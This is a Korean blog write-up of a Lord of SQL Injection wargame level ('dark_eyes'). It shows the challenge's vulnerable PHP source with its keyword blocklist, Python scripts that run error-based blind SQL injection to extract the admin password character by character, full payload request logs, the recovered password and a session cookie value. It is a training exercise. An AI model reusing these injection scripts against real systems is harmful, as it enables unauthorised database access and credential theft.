


[Lord Of SQL Injection] 22번(error blind sql)

Kwon Oh! JUN 2022. 2. 13. 00:50

query : select id from prob_dark_eyes where id='admin' and pw=''



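<?php
  // Challenge source as shown on the page. The page's syntax-highlighting
  // extraction dropped the '=', ',' and ';' tokens; they are restored here so
  // the listing is valid PHP again. Logic is unchanged.
  include "./config.php";
  login_chk();
  $db = dbconnect();
  // Keyword blocklist on the raw pw parameter. A blocklist is not a substitute
  // for a parameterised query: the quote character itself still passes, so the
  // string below can be broken out of. Prepared statements with bound
  // parameters would close the injection regardless of the blocklist.
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  // pw is interpolated unescaped into the SQL text.
  $query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  // '@' hides PHP warnings from a failed query; the DB error is checked below.
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  // The error text is never shown, but a query error ends the response with no
  // output at all. Whether the echo below appears therefore still reveals one
  // bit per request (error-based blind oracle). Hiding error text is not the
  // same as hiding the error.
  if(mysqli_error($db)) exit();
  echo "<hr>query : <strong>{$query}</strong><hr><br>";

  // Second query uses the escaped value and compares it with the stored pw.
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
  highlight_file(__FILE__);
?>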

 

21번 문제와 비슷한데, 다른 점이 있다면 if문이 필터링(예외처리)되어 있고, error가 발생해도 error문을 보여주지 않고 exit()되어 여백(빈 화면)이 된다는 것이다.

 

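"""Password-length probe for the dark_eyes challenge (error-based blind SQLi).

The server hides error text but calls exit() on a query error, so a
response without the usual "query : ..." echo means the injected
subquery errored. That subquery (``select 1 union select 2``, two rows
where a single value is expected) only errors when its WHERE clause
is true, so each request answers one yes/no question about ``length(pw)``.
"""
import os
import string

import requests

url = "https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php"
# Session token of the logged-in challenge account. Read from the environment
# when available so the literal need not live in (or be committed with) the
# script; the inline value is the one from the original run.
cookie = dict(PHPSESSID=os.environ.get("PHPSESSID", "qh6cd97grivfurvhcaobv2sqjt"))

# Seconds before a stalled connection raises instead of hanging the loop.
TIMEOUT = 10

for i in range(1, 100):
    param = "?pw='or id='admin' and (select 1 union select 2 where length(pw)="+str(i)+")%23"
    # The if()-based variant is rejected by the server's /col|if|case|.../ filter.
    #param = "?pw='or id='admin' and if(length(pw)="+str(i)+", 1, (select 1 union select 2))%23"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie, timeout=TIMEOUT)
    print(len_result)

    # Missing echo -> subquery errored -> the WHERE clause held -> length is i.
    if response.text.find("query") < 0:
        print("password :"+str(i))
        break
else:
    # Report exhaustion explicitly instead of ending silently.
    print("password : length not found in 1..99")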
(select 1 union select 2 where length(pw)="+str(i)+")

select 1 union select 2가 서브쿼리 오류를 발생시키는데, where 조건 length(pw)="+str(i)+" 가 참일 때, 즉 pw의 길이가 i일 때만 그 오류가 발생한다.

즉 where절의 조건을 만족시키면 서브쿼리 오류가 발생한다. 오류가 발생하면 아무것도 뜨지 않는다.(여백)

id='admin' and (select 1 union select 2 where length(pw)=1)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=2)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=3)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=4)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=5)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=6)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=7)%23
https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw='or 
id='admin' and (select 1 union select 2 where length(pw)=8)%23
password :8

패스워드 길이는 8자

 

패스워드를 구해보면

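"""Character-by-character recovery for dark_eyes (error-based blind SQLi).

Same oracle as the length probe: a response without the "query : ..."
echo means the injected ``select 1 union select 2`` subquery errored,
which only happens when its WHERE clause is true. The clause
``right(left(pw, i), 1) = c`` tests whether the i-th character of pw is c.
"""
import os
import string

import requests


url = "https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php"
# Session token of the logged-in challenge account; environment override so the
# literal need not be committed. The inline value is the one from the original run.
cookie = dict(PHPSESSID=os.environ.get("PHPSESSID", "qh6cd97grivfurvhcaobv2sqjt"))

# Seconds before a stalled connection raises instead of hanging the loop.
TIMEOUT = 10

# Candidate alphabet, tried in this order (digits first, then letters).
# NOTE(review): '=' on strings is collation-dependent; under a case-insensitive
# collation upper- and lower-case letters would be indistinguishable here — confirm.
asc = string.digits+string.ascii_letters
print(asc)
result=""

for i in range(1,9):  # 8 = length found by the length probe
    for j in asc:
        param = "?pw='or id='admin' and (select 1 union select 2 where right(left(pw, "+str(i)+"),1)='"+str(j)+"') %23"
        # The if()/ord()/substr() variant is rejected by the server's /col|if|case|.../ filter.
        #param = "?pw='or id='admin' and if(ord(substr(pw,"+str(i)+",1))="+str(ord(j))+",(select 1 union select 2), 1)%23"
        print(param)
        res_url = url+param
        response = requests.get(res_url, cookies=cookie, timeout=TIMEOUT)

        # Missing echo -> subquery errored -> character i equals j.
        if response.text.find("query")<0:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            break
    else:
        # No candidate matched; keep a placeholder so later positions stay aligned
        # instead of silently producing a shorter, shifted result.
        print(str(i)+"번째 패스워드 : 일치하는 문자 없음")
        result+="?"
print("pw :"+result)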
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 1),1)='5') %23
1번째 패스워드 :5
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='5') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='6') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='7') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='8') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='9') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 2),1)='a') %23
2번째 패스워드 :a
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 3),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 3),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 3),1)='2') %23
3번째 패스워드 :2
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='5') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='6') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='7') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='8') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='9') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='a') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='b') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='c') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='d') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='e') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 4),1)='f') %23
4번째 패스워드 :f
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 5),1)='5') %23
5번째 패스워드 :5
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='5') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='6') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='7') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='8') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='9') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='a') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='b') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='c') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 6),1)='d') %23
6번째 패스워드 :d
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 7),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 7),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 7),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 7),1)='3') %23
7번째 패스워드 :3
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='0') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='1') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='2') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='3') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='4') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='5') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='6') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='7') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='8') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='9') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='a') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='b') %23
?pw='or id='admin' and (select 1 union select 2 where right(left(pw, 8),1)='c') %23
8번째 패스워드 :c
pw :5a2f5d3c

query : select id from prob_dark_eyes where id='admin' and pw='5a2f5d3c'


 

DARK_EYES Clear!


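<?php
  // Challenge source as shown on the page. The page's syntax-highlighting
  // extraction dropped the '=', ',' and ';' tokens; they are restored here so
  // the listing is valid PHP again. Logic is unchanged.
  include "./config.php";
  login_chk();
  $db = dbconnect();
  // Keyword blocklist on the raw pw parameter. A blocklist is not a substitute
  // for a parameterised query: the quote character itself still passes, so the
  // string below can be broken out of. Prepared statements with bound
  // parameters would close the injection regardless of the blocklist.
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  // pw is interpolated unescaped into the SQL text.
  $query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  // '@' hides PHP warnings from a failed query; the DB error is checked below.
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  // The error text is never shown, but a query error ends the response with no
  // output at all. Whether the echo below appears therefore still reveals one
  // bit per request (error-based blind oracle). Hiding error text is not the
  // same as hiding the error.
  if(mysqli_error($db)) exit();
  echo "<hr>query : <strong>{$query}</strong><hr><br>";

  // Second query uses the escaped value and compares it with the stored pw.
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
  highlight_file(__FILE__);
?>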

 

 

++추가

if response.text.find("query")<0:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            break

"query"로 바꾼 이유는, 바로 위의 페이지 화면에서 보듯 에러가 발생하면 위의 화면이 출력되지 않고 여백(빈 화면)이 되기 때문에, 정상 출력에 포함된 문자열 중 아무것이나 판별 기준으로 쓰면 되기 때문이다. (query, select 등)